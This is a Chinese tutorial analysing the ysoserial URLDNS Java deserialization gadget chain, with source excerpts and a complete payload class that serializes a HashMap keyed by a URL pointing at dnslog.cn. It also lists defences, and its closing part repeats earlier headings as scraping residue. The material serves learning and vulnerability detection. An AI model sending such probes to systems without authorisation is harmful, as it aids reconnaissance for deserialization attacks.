JAVA反序列化-ysoserial-URLDNS原理分析<\/h1>

1. 概述<\/h2>

1.1 ysoserial简介<\/h3>
ysoserial是一个Java反序列化工具，它通过指定利用链生成恶意序列化数据。当目标系统对这些数据进行反序列化时，会触发恶意代码执行。<\/p>

1.2 URLDNS利用链特点<\/h3>

URLDNS是ysoserial中的一个特殊利用链，具有以下特点：<\/p>

不能执行任意命令<\/li>
只能请求指定的URL<\/li>

主要用于检测目标是否存在反序列化漏洞<\/li> <\/ul>

2. 核心原理分析<\/h2>

2.1 URL类工作机制<\/h3>

2.1.1 hashCode方法<\/h4>

URL类的hashCode方法会触发DNS请求：<\/p>

public<\/span> synchronized<\/span> int<\/span> hashCode<\/span>()<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>hashCode !=<\/span> -<\/span>1<\/span>)<\/span>
<\/span><\/span>        return<\/span> hashCode;<\/span>
<\/span><\/span>    
<\/span><\/span>    hashCode =<\/span> handler.<\/span>hashCode<\/span>(<\/span>this<\/span>);<\/span>  \/\/ 这里会触发DNS请求
<\/span><\/span><\/span><\/span>    return<\/span> hashCode;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.1.2 URLStreamHandler.hashCode<\/h4>
该方法会解析URL的各个部分并获取主机地址：<\/p>
protected<\/span> int<\/span> hashCode<\/span>(<\/span>URL u)<\/span> {<\/span>
<\/span><\/span>    String protocol =<\/span> u.<\/span>getProtocol<\/span>();<\/span>
<\/span><\/span>    InetAddress addr =<\/span> getHostAddress(<\/span>u);<\/span>  \/\/ 这里实际发起DNS请求
<\/span><\/span><\/span><\/span>    String file =<\/span> u.<\/span>getFile<\/span>();<\/span>
<\/span><\/span>    String ref =<\/span> u.<\/span>getRef<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 计算各部分hashCode并组合
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2 HashMap类与反序列化<\/h3>
2.2.1 序列化特性<\/h4>
HashMap实现了Serializable接口，支持序列化和反序列化：<\/p>
public<\/span> class<\/span> HashMap<\/span><<\/span>K,<\/span>V><\/span> extends<\/span> AbstractMap<<\/span>K,<\/span>V><\/span>
<\/span><\/span>    implements<\/span> Map<<\/span>K,<\/span>V>,<\/span> Cloneable,<\/span> Serializable
<\/span><\/span><\/code><\/pre>2.2.2 反序列化过程<\/h4>
HashMap在反序列化时会调用readObject方法：<\/p>
private<\/span> void<\/span> readObject<\/span>(<\/span>java.<\/span>io<\/span>.<\/span>ObjectInputStream<\/span> s)<\/span>
<\/span><\/span>    throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    \/\/ 读取键值对
<\/span><\/span><\/span><\/span>    for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> mappings;<\/span> i++)<\/span> {<\/span>
<\/span><\/span>        K key =<\/span> (<\/span>K)<\/span> s.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>        V value =<\/span> (<\/span>V)<\/span> s.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>        putVal(<\/span>hash(<\/span>key),<\/span> key,<\/span> value,<\/span> false<\/span>,<\/span> false<\/span>);<\/span>  \/\/ 关键点
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2.3 hash方法触发机制<\/h4>
putVal方法会调用hash方法：<\/p>
static<\/span> final<\/span> int<\/span> hash<\/span>(<\/span>Object key)<\/span> {<\/span>
<\/span><\/span>    int<\/span> h;<\/span>
<\/span><\/span>    return<\/span> (<\/span>key ==<\/span> null<\/span>)<\/span> ?<\/span> 0<\/span> :<\/span> (<\/span>h =<\/span> key.<\/span>hashCode<\/span>())<\/span> ^<\/span> (<\/span>h >>><\/span> 16<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 利用链构造<\/h2>
3.1 基本思路<\/h3>

创建HashMap对象<\/li>
创建URL对象作为key<\/li>
将URL对象放入HashMap<\/li>
序列化HashMap<\/li>
目标反序列化时触发DNS请求<\/li>
<\/ol>
3.2 关键问题与解决方案<\/h3>
3.2.1 hashCode缓存问题<\/h4>
直接构造会导致URL的hashCode被缓存，反序列化时不会触发DNS请求：<\/p>
HashMap hashMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>URL url =<\/span> new<\/span> URL(<\/span>"http:\/\/dnslog.cn"<\/span>);<\/span>
<\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>url,<\/span> "test"<\/span>);<\/span>  \/\/ 这里已经计算了hashCode并缓存
<\/span><\/span><\/span><\/code><\/pre>3.2.2 反射修改hashCode<\/h4>
使用反射在序列化前重置hashCode：<\/p>
Field field =<\/span> url.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"hashCode"<\/span>);<\/span>
<\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>field.<\/span>set<\/span>(<\/span>url,<\/span> -<\/span>1<\/span>);<\/span>  \/\/ 重置为-1，强制重新计算
<\/span><\/span><\/span><\/code><\/pre>3.3 完整Payload构造<\/h3>
public<\/span> class<\/span> URLDNSPayload<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        HashMap hashMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        URL url =<\/span> new<\/span> URL(<\/span>"http:\/\/dnslog.cn"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 使用反射修改hashCode
<\/span><\/span><\/span><\/span>        Field field =<\/span> url.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"hashCode"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>url,<\/span> -<\/span>1<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>url,<\/span> "payload"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化
<\/span><\/span><\/span><\/span>        ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"payload.bin"<\/span>));<\/span>
<\/span><\/span>        oos.<\/span>writeObject<\/span>(<\/span>hashMap);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 反序列化触发
<\/span><\/span><\/span><\/span>        ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"payload.bin"<\/span>));<\/span>
<\/span><\/span>        ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 利用场景<\/h2>
4.1 漏洞检测<\/h3>

用于检测目标是否存在Java反序列化漏洞<\/li>
通过DNS日志确认漏洞存在<\/li>
<\/ul>
4.2 优势<\/h3>

不依赖特定第三方库<\/li>
仅触发DNS请求，相对隐蔽<\/li>
适用于各种Java环境<\/li>
<\/ul>
5. 防御措施<\/h2>
5.1 输入验证<\/h3>

对反序列化数据进行严格验证<\/li>
<\/ul>
5.2 安全配置<\/h3>

使用ObjectInputFilter限制反序列化类<\/li>
更新Java运行环境<\/li>
<\/ul>
5.3 代码层面<\/h3>

避免直接反序列化不可信数据<\/li>
重写readObject方法添加安全检查<\/li>
<\/ul>
6. 总结<\/h2>
URLDNS利用链通过巧妙组合Java原生类的特性实现漏洞检测：<\/p>

利用HashMap反序列化时自动调用hash方法的特性<\/li>
通过URL类的hashCode方法触发DNS请求<\/li>
使用反射绕过hashCode缓存机制<\/li>
整个过程不依赖任何第三方库，通用性强<\/li>
<\/ol>
这种技术虽然不能直接执行命令，但在漏洞探测阶段具有重要价值。<\/p>

JAVA反序列化-ysoserial-URLDNS原理分析<\/h1>

1. 概述<\/h2>

1.1 ysoserial简介<\/h3> ysoserial是一个Java反序列化工具，它通过指定利用链生成恶意序列化数据。当目标系统对这些数据进行反序列化时，会触发恶意代码执行。<\/p>

2. 核心原理分析<\/h2>

2.1 URL类工作机制<\/h3>

2.2 HashMap类与反序列化<\/h3>

3. 利用链构造<\/h2>

3.2 关键问题与解决方案<\/h3>

4. 利用场景<\/h2>

5. 防御措施<\/h2>

1.1 ysoserial简介<\/h3>
ysoserial是一个Java反序列化工具，它通过指定利用链生成恶意序列化数据。当目标系统对这些数据进行反序列化时，会触发恶意代码执行。<\/p>